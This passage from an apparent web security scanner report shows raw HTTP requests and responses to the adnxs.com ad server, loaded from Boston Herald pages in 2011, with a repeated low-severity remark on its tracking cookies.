acb322141=5_[r^208WMZzhw!0nf8M'VILZ?enc=AAAAAAAA4D_NzMzMzMzcPwAAAKCZmQFAzczMzMzM3D8AAAAAAADgP8QzzGlufgMIBWHfHSmrEELSQENNAAAAACQ9AwA3AQAAbAEAAAIAAACDbAIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQE_AUBAgUCAAIAAAAAUCD5SgAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+8044%2C+1296253138%29%3Buf%28%27c%27%2C+43438%2C+1296253138%29%3Buf%28%27g%27%2C+18638%2C+1296253138%29%3Buf%28%27r%27%2C+158851%2C+1296253138%29%3Bppv%288484%2C+%27577444189920048068%27%2C+1296253138%2C+1296857938%2C+43438%2C+24319%29%3Bppv%288484%2C+%27577444189920048068%27%2C+1296253138%2C+1296857938%2C+43438%2C+24319%29%3B&cnd=!wRdxQwiu0wIQg9kJGAAg_70BKNQJMQAAAAAAAOA_QhMIABAAGAAgASj-__________8BQgsIpEIQABgAIAMoAUILCKRCEAAYACACKAFIAVAAWKoDYABo7AI.; path=/; expires=Sat, 29-Jan-2011 22:18:58 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:18:58 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Thu, 28-Apr-2011 22:18:58 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Date: Fri, 28 Jan 2011 22:18:58 GMT Content-Length: 833
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ptj?member=311&inv_code=cm.rev_bostonherald&size=300x250&referrer=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_bostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-98462601_1296252387%2C11d765b6a10b1b3%2Cent%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D274606%3Bcontx%3Dent%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dbk.rdst1%3Bbtg%3Dmm.aa1%3Bbtg%3Dmm.ac1%3Bbtg%3Dmm.ad1%3Bbtg%3Dmm.ae5%3Bbtg%3Dmm.af5%3Bbtg%3Dmm.ak1%3Bbtg%3Dmm.ap5%3Bbtg%3Dmm.aq1%3Bbtg%3Dmm.ar1%3Bbtg%3Dmm.au1%3Bbtg%3Dmm.da1%3Bbtg%3Dmm.db2%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D0.9608076433651149%3F HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: sess=1; icu=EAAYAA..; acb119885=5_[r^208WMrO@Pn)IE.80Xxlp?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQP-hU1RiHaOEDBWHfHSmrEELrPENNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEBAkBAgUCAAIAAAAAeiENGgAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296252139%29%3Buf%28%27r%27%2C+151403%2C+1296252139%29%3Bppv%2882%2C+%27279619581320189160%27%2C+1296252139%2C+1306620139%2C+2132%2C+24319%29%3Bppv%2884%2C+%27279619581320189160%27%2C+1296252139%2C+1306620139%2C+2132%2C+24319%29%3Bppv%2811%2C+%27279619581320189160%27%2C+1296252139%2C+1306620139%2C+2132%2C+24319%29%3Bppv%2882%2C+%27279619581320189160%27%2C+1296252139%2C+1306620139%2C+2132%2C+24319%29%3Bppv%2884%2C+%27279619581320189160%27%2C+1296252139%2C+1306620139%2C+2132%2C+24319%29%3Bppv%2887%2C+%27279619581320189160%27%2C+1296252139%2C+1296338539%2C+2132%2C+24319%29%3Bppv%28619%2C+%27279619581320189160%27%2C+1296252139%2C+1296338539%2C+2132%2C+24319%29%3Bppv%28620%2C+%27279619581320189160%27%2C+1296252139%2C+1296338539%2C+2132%2C+24319%29%3Bppv%28621%2C+%27279619581320189160%27%2C+1296252139%2C+1296338539%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`)
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Sun, 30-Jan-2011 01:42:25 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:25 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb119885=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: icu=EAAYAA..; path=/; expires=Fri, 29-Apr-2011 01:42:25 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb855999=5_[r^208WMM2x@N!@@-#bq9B8?enc=fBSuR-F6xD8830-Nl27CPwAAAKCZmQFAPN9PjZduwj97FK5H4XrEP8bZnQsCO006BWHfHSmrEEKBcENNAAAAACQ9AwA3AQAAsQAAAAIAAAB4xgEA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEIwkBAgUCAAIAAAAAjSFWAgAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+379%2C+1296265345%29%3Buf%28%27r%27%2C+116344%2C+1296265345%29%3B&cnd=!-xaQmAic0QEQ-IwHGAAg_70BKNQJMXsUrkfhesQ_QhMIABAAGAAgASj-__________8BSABQAFiqA2AAaLEB; path=/; expires=Sun, 30-Jan-2011 01:42:25 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:25 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Fri, 29-Apr-2011 01:42:25 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Date: Sat, 29 Jan 2011 01:42:25 GMT Content-Length: 741
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ptj?member=311&inv_code=cm.quadbostonherald&size=300x250&referrer=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.quadbostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-31727353_1296259318%2C11d765b6a10b1b3%2Cent%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_l-cm.weath_l-cm.sports_h-cm.ent_h-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D604786%3Bcontx%3Dent%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.rdst7%3Bbtg%3Dcm.rdst8%3Bbtg%3Dcm.polit_l%3Bbtg%3Dcm.weath_l%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.ent_h%3Bbtg%3Dbk.rdst1%3Bbtg%3Dmm.aa1%3Bbtg%3Dmm.ac1%3Bbtg%3Dmm.ad1%3Bbtg%3Dmm.ae5%3Bbtg%3Dmm.af5%3Bbtg%3Dmm.ak1%3Bbtg%3Dmm.ap5%3Bbtg%3Dmm.aq1%3Bbtg%3Dmm.ar1%3Bbtg%3Dmm.au1%3Bbtg%3Dmm.da1%3Bbtg%3Dmm.db2%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D%5Btimestamp%5D%3F HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: sess=1; icu=EAAYAA..; acb781784=5_[r^208WMt+t%s!@@-#?/ty]?enc=FuY9zjRhyT96tTdTfNfGPwAAAKCZmQlAerU3U3zXxj8V5j3ONGHJP-d6bImG40osBWHfHSmrEEIVVUNNAAAAANc8AwA3AQAAZAAAAAIAAABrTwIAsl4AAAEAAABVU0QAVVNEACwB-gCqAQAA3AUBAgUCAAUAAAAAVyHLDgAAAAA.&tt_code=cm.quadbostonherald&udj=uf%28%27a%27%2C+27%2C+1296258325%29%3Buf%28%27r%27%2C+151403%2C+1296258325%29%3Bppv%2882%2C+%273191613452916128487%27%2C+1296258325%2C+1306626325%2C+2132%2C+24242%29%3Bppv%2884%2C+%273191613452916128487%27%2C+1296258325%2C+1306626325%2C+2132%2C+24242%29%3Bppv%2811%2C+%273191613452916128487%27%2C+1296258325%2C+1306626325%2C+2132%2C+24242%29%3Bppv%2882%2C+%273191613452916128487%27%2C+1296258325%2C+1306626325%2C+2132%2C+24242%29%3Bppv%2884%2C+%273191613452916128487%27%2C+1296258325%2C+1306626325%2C+2132%2C+24242%29%3Bppv%2887%2C+%273191613452916128487%27%2C+1296258325%2C+1296344725%2C+2132%2C+24242%29%3Bppv%28619%2C+%273191613452916128487%27%2C+1296258325%2C+1296344725%2C+2132%2C+24242%29%3Bppv%28620%2C+%273191613452916128487%27%2C+1296258325%2C+1296344725%2C+2132%2C+24242%29%3Bppv%28621%2C+%273191613452916128487%27%2C+1296258325%2C+1296344725%2C+2132%2C+24242%29%3B&cnd=!_BsQQQjUEBDrngkYwI8BILK9ASgAMczraoU2Yck_QhMIABAAGAAgASj-__________8BQgwIUhDL3AYYAiADKABCDAhUEJa5DRgFIAMoAEgBUABYqgNgAGhk&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7*@DYS3+0s]#%2L_'x%SEV/i#-2N=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]-sVkK=XaP9JgIyKY?AZ2?cN2AYU+6+y:OCAzxnxZ]T%isfEi1j6e[?U_=%p.dR$pzM:4KKhq.Wf[V?>]Uq'j<LI7Z3NZg<?)dNKuDMOC67s9kowxd<'fQ6TwL.7!@Nno(bTV'J<hKMSzM(Q66u2x%X_(L:SlM('INuCClbQ^7w=#?jImiX^<V8sfuU'X?D5U]Q?rbY+o@X$D@^v
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Sun, 30-Jan-2011 00:01:58 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 00:01:58 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb781784=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: icu=EAAYAA..; path=/; expires=Fri, 29-Apr-2011 00:01:58 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb725885=5_[r^208WMM2x@N!@@-#43LyA?enc=fBSuR-F6xD8830-Nl27CPwAAAKCZmQlAPN9PjZduwj97FK5H4XrEP5TFsK1Hqr8OBWHfHSmrEEL2WENNAAAAANc8AwA3AQAAsQAAAAIAAAB4xgEAsl4AAAEAAABVU0QAVVNEACwB-gCqAQAA_gYBAgUCAAUAAAAAwyMSswAAAAA.&tt_code=cm.quadbostonherald&udj=uf%28%27a%27%2C+379%2C+1296259318%29%3Buf%28%27r%27%2C+116344%2C+1296259318%29%3B&cnd=!0RVLXwic0QEQ-IwHGAAgsr0BKAAxexSuR-F6xD9CEwgAEAAYACABKP7__________wFIAFAAWKoDYABosQE.; path=/; expires=Sun, 30-Jan-2011 00:01:58 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 00:01:58 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG7*@DYS3+0s]#%2L_'x%SEV/i#-2N=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]-sVkK=XaP9JgIyKY?AZ2?cN2AYU+6+y:OCAzxnxZ]T%isfEi1j6e[?U_=%p.dR$pzM:4KKhq.Wf[V?>]Uq'j<LI7Z3NZg<?)dNKuDMOC67s9kowxd<'fQ6TwL.7!@Nno(bTV'J<hKMSzM(Q66u2x%X_(L:SlM('INuCClbQ^7w=#?jImiX^<V8sfuU'X?D5U]Q?rbY+o@X$D@^v; path=/; expires=Fri, 29-Apr-2011 00:01:58 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Date: Sat, 29 Jan 2011 00:01:58 GMT Content-Length: 826
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ptj?member=311&inv_code=cm.quadbostonherald&size=300x250&referrer=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.quadbostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-59440650_1296255616%2C11d765b6a10b1b3%2Cent%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_l-cm.sports_h-cm.weath_l-cm.ent_m-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D901204%3Bcontx%3Dent%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.rdst7%3Bbtg%3Dcm.rdst8%3Bbtg%3Dcm.polit_l%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dcm.ent_m%3Bbtg%3Dbk.rdst1%3Bbtg%3Dmm.aa1%3Bbtg%3Dmm.ac1%3Bbtg%3Dmm.ad1%3Bbtg%3Dmm.ae5%3Bbtg%3Dmm.af5%3Bbtg%3Dmm.ak1%3Bbtg%3Dmm.ap5%3Bbtg%3Dmm.aq1%3Bbtg%3Dmm.ar1%3Bbtg%3Dmm.au1%3Bbtg%3Dmm.da1%3Bbtg%3Dmm.db2%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D%5Btimestamp%5D%3F HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: icu=EAAYAA..; anj=Kfu=8fG7*@DYS3+0s]#%2L_'x%SEV/i#-2N=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]-sVkK=XaP9JgIyKY?AZ2?cN2AYU+6+y:OCAzxnxZ]T%isfEi1j6e[?U_=%p.dR$pzM:4KKhq.Wf[V?>]Uq'j<LI7Z3NZg<?)dNKuDMOC67s9kowxd<'fQ6TwL.7!@Nno(bTV'J<hKMSzM(Q66u2x%X_(L:SlM('INuCClbQ^7w=#?jImiX^<V8sfuU'X?D5U]Q?rbY+o@X$D@^v; sess=1; uuid2=4760492999213801733
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 23:00:16 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 23:00:16 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: icu=EAAYAA..; path=/; expires=Thu, 28-Apr-2011 23:00:16 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb780011=5_[r^208WMt+t%s!@@-#bPpSh?enc=FuY9zjRhyT96tTdTfNfGPwAAAKCZmQlAerU3U3zXxj8V5j3ONGHJP_qJUyg65S1xBWHfHSmrEEKASkNNAAAAANc8AwA3AQAAZAAAAAIAAABrTwIAsl4AAAEAAABVU0QAVVNEACwB-gCqAQAApQQBAgUCAAUAAAAABSGv_AAAAAA.&tt_code=cm.quadbostonherald&udj=uf%28%27a%27%2C+27%2C+1296255616%29%3Buf%28%27r%27%2C+151403%2C+1296255616%29%3Bppv%2882%2C+%278155426538185263610%27%2C+1296255616%2C+1306623616%2C+2132%2C+24242%29%3Bppv%2884%2C+%278155426538185263610%27%2C+1296255616%2C+1306623616%2C+2132%2C+24242%29%3Bppv%2811%2C+%278155426538185263610%27%2C+1296255616%2C+1306623616%2C+2132%2C+24242%29%3Bppv%2882%2C+%278155426538185263610%27%2C+1296255616%2C+1306623616%2C+2132%2C+24242%29%3Bppv%2884%2C+%278155426538185263610%27%2C+1296255616%2C+1306623616%2C+2132%2C+24242%29%3Bppv%2887%2C+%278155426538185263610%27%2C+1296255616%2C+1296342016%2C+2132%2C+24242%29%3Bppv%28619%2C+%278155426538185263610%27%2C+1296255616%2C+1296342016%2C+2132%2C+24242%29%3Bppv%28620%2C+%278155426538185263610%27%2C+1296255616%2C+1296342016%2C+2132%2C+24242%29%3Bppv%28621%2C+%278155426538185263610%27%2C+1296255616%2C+1296342016%2C+2132%2C+24242%29%3B&cnd=!_BsQQQjUEBDrngkYwI8BILK9ASgAMczraoU2Yck_QhMIABAAGAAgASj-__________8BQgwIUhDL3AYYAiADKABCDAhUEJa5DRgFIAMoAEgBUABYqgNgAGhk&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Sat, 29-Jan-2011 23:00:16 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 23:00:16 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG7*@DYS3+0s]#%2L_'x%SEV/i#-2N=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]-sVkK=XaP9JgIyKY?AZ2?cN2AYU+6+y:OCAzxnxZ]T%isfEi1j6e[?U_=%p.dR$pzM:4KKhq.Wf[V?>]Uq'j<LI7Z3NZg<?)dNKuDMOC67s9kowxd<'fQ6TwL.7!@Nno(bTV'J<hKMSzM(Q66u2x%X_(L:SlM('INuCClbQ^7w=#?jImiX^<V8sfuU'X?D5U]Q?rbY+o@X$D@^v; path=/; expires=Thu, 28-Apr-2011 23:00:16 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Date: Fri, 28 Jan 2011 23:00:16 GMT Content-Length: 826
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ptj?member=311&inv_code=cm.rev_bostonherald&size=300x250&referrer=http%3A%2F%2Fad.afy11.net%2Fad%3FasId%3D1000004165407%26sd%3D2x300x250%26ct%3D15%26enc%3D0%26nif%3D0%26sf%3D0%26sfd%3D0%26ynw%3D0%26anw%3D1%26rand%3D38178276%26rk1%3D15197426%26rk2%3D1296251850.36%26pt%3D0&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_bostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-48597195_1296251864%2C11d765b6a10b1b3%2CMiscellaneous%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D199062%3Bcontx%3DMiscellaneous%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D0.3579352851957083%3F HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://ad.yieldmanager.com/iframe3?9HYAALcHCQBs1TAAAAAAACagDQAAAAAAAgAAAAIAAAAAAP8AAAAGEEpSEwAAAAAA3E0TAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0fwQAAAAAAAIAAgAAAAAAMzMzMzMz4z8zMzMzMzPjPzMzMzMzM-M.MzMzMzMz4z8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADkabZVVyCMCQdR9BcEZzEqrQhaqvUZmvTUBRq8AAAAAA==,,http%3A%2F%2Fad.afy11.net%2Fad%3Fasid%3D1000004165407%26sd%3D2x300x250%26ct%3D15%26enc%3D0%26nif%3D0%26sf%3D0%26sfd%3D0%26ynw%3D0%26anw%3D1%26rand%3D38178276%26rk1%3D15197426%26rk2%3D1296251850.36%26pt%3D0,Z%3D300x250%26s%3D591799%26r%3D0%26_salt%3D195542946%26u%3Dhttp%253A%252F%252Fad.afy11.net%252Fad%253FasId%253D1000004165407%2526sd%253D2x300x250%2526ct%253D15%2526enc%253D0%2526nif%253D0%2526sf%253D0%2526sfd%253D0%2526ynw%253D0%2526anw%253D1%2526rand%253D38178276%2526rk1%253D15197426%2526rk2%253D1296251850.36%2526pt%253D0,a1b64ea0-2b29-11e0-8dc4-003048d6cfae Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: icu=EAAYAA..; sess=1; uuid2=4760492999213801733; anj=Kfu=8fG3H<fQCe7?0P(*AuB-u**g1:XIC(WUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy6A3fm`:Idk3X!(*W2F2Hk''SykpRE%:434AnQ9O>WxYDWB13NOp+/5AIyhgU6ROEcF@:XJvR6qJ:uuL`8Q2Vw2t![$ph'S1S['D+Ir$>37Xp$KdW'FoQ)MSzM(Q66u2x%X_(L:Sjx('INuCClbQ^7w=#?jImiX^<V8sfuU'X?D5U]Q?rbY+o>Pj9!*^
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Sun, 30-Jan-2011 01:42:21 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:21 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: icu=EAAYAA..; path=/; expires=Fri, 29-Apr-2011 01:42:21 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb506874=5_[r^208WMM2x@N!@@-#aWxt4?enc=fBSuR-F6xD8830-Nl27CPwAAAKCZmQFAPN9PjZduwj97FK5H4XrEP9q3wM3c37k8BWHfHSmrEEJ9cENNAAAAACQ9AwA3AQAAsQAAAAIAAAB4xgEA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEkgUBAgUCAAIAAAAAtyQC8QAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+379%2C+1296265341%29%3Buf%28%27r%27%2C+116344%2C+1296265341%29%3B&cnd=!-xaQmAic0QEQ-IwHGAAg_70BKNQJMXsUrkfhesQ_QhMIABAAGAAgASj-__________8BSABQAFiqA2AAaLEB; path=/; expires=Sun, 30-Jan-2011 01:42:21 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:21 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: 